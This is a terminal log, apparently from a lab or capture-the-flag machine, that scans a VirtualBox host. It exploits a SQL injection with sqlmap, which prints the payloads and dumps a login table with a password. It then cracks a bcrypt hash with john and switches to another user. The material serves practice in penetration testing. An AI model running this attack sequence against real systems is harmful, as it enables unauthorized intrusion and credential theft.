❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08    VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57    VMware, Inc.
192.168.60.168  08:00:27:c5:86:bc    PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e0:65:b2    VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.064 seconds (124.03 hosts/sec). 4 responded

❯ export ip=192.168.60.168
❯ rustscan -a $ip
The Modern Day Port Scanner.
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.168:22
Open 192.168.60.168:80
Open 192.168.60.168:8080
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-31 16:30 CST
Initiating ARP Ping Scan at 16:30
Scanning 192.168.60.168 [1 port]
Completed ARP Ping Scan at 16:30, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:30
Completed Parallel DNS resolution of 1 host. at 16:30, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:30
Scanning 192.168.60.168 [3 ports]
Discovered open port 80/tcp on 192.168.60.168
Discovered open port 8080/tcp on 192.168.60.168
Discovered open port 22/tcp on 192.168.60.168
Completed SYN Stealth Scan at 16:30, 0.05s elapsed (3 total ports)
Nmap scan report for 192.168.60.168
Host is up, received arp-response (0.00043s latency).
Scanned at 2025-01-31 16:30:22 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
8080/tcp open  http-proxy syn-ack ttl 64
MAC Address: 08:00:27:C5:86:BC (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)
❯ sqlmap -u "http://192.168.60.168:8080/search.php?query=" --batch -D FlatPress -T login --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.8.12#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:58:17 /2025-01-31/

[16:58:17] [WARNING] provided value for parameter 'query' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[16:58:17] [INFO] resuming back-end DBMS 'mysql'
[16:58:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: query=' AND (SELECT 6584 FROM (SELECT(SLEEP(5)))xQes) AND 'IrcU'='IrcU

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: query=' UNION ALL SELECT CONCAT(0x71786b7671,0x52545875617474437a52685277445446484e557661614c4a6143585949734c6b62714d674b6a7156,0x71706a7071),NULL,NULL,NULL,NULL-- -
---
[16:58:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.62
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[16:58:17] [INFO] fetching columns for table 'login' in database 'FlatPress'
[16:58:17] [INFO] fetching entries for table 'login' in database 'FlatPress'
Database: FlatPress
Table: login
[1 entry]
+----+--------+-----------------------+
| id | user   | password              |
+----+--------+-----------------------+
| 1  | r0dgar | SNIETbkGBCnhFqeUJuqBO |
+----+--------+-----------------------+

[16:58:17] [INFO] table 'FlatPress.login' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/192.168.60.168/dump/FlatPress/login.csv'
[16:58:17] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/192.168.60.168'

[*] ending @ 16:58:17 /2025-01-31/
(remote) www-data@TheHackersLabs-Base:/home/flate$ cd /opt/
(remote) www-data@TheHackersLabs-Base:/opt$ ls
hash.txt
(remote) www-data@TheHackersLabs-Base:/opt$ cat hash.txt
$2b$12$Qq75yQ3G.ydG2nxr4LzAPeJ6GE8po1NtjOAGZ2l1aIGa5//I5J/Xq

--------------------- separator ---------------------

❯ vim hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secret           (?)
1g 0:00:00:01 DONE (2025-01-31 17:32) 0.8264g/s 59.50p/s 59.50c/s 59.50C/s justin..666666
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
adm user group
Switch user
(remote) www-data@TheHackersLabs-Base:/home$ su pedro
Password:
pedro@TheHackersLabs-Base:/tmp$ id
uid=1001(pedro) gid=1001(pedro) grupos=1001(pedro),4(adm)